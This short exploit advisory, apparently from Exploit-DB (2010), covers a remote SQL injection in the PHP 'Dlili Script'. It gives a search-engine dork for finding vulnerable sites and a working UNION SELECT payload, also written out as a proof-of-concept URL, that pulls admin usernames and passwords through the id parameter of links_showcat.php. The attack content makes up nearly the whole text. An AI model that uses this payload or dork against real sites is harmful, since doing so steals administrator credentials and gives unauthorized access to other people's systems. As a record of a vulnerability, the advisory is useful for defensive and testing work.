Dlili Script - SQL Injection

EDB-ID:

11318

CVE:

N/A




Platform:

PHP

Date:

2010-02-02


==============================================================================
                  Remote SQL Injection Vulnerability
  ==============================================================================
    [+] Published:           [2010-02-02]
    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
    [+] Author:              {Dr.DaShEr> Nyo@hotmail.com < ]
    [+] Gr44tz to:           [NeX HackEr & XP10_hacker]
  ########################################################################


   [+] Dork: inurl:"links_showcat.php?"


   =[ Exploit ]=

   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] SQLi p0c:

   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


  ###########################################################################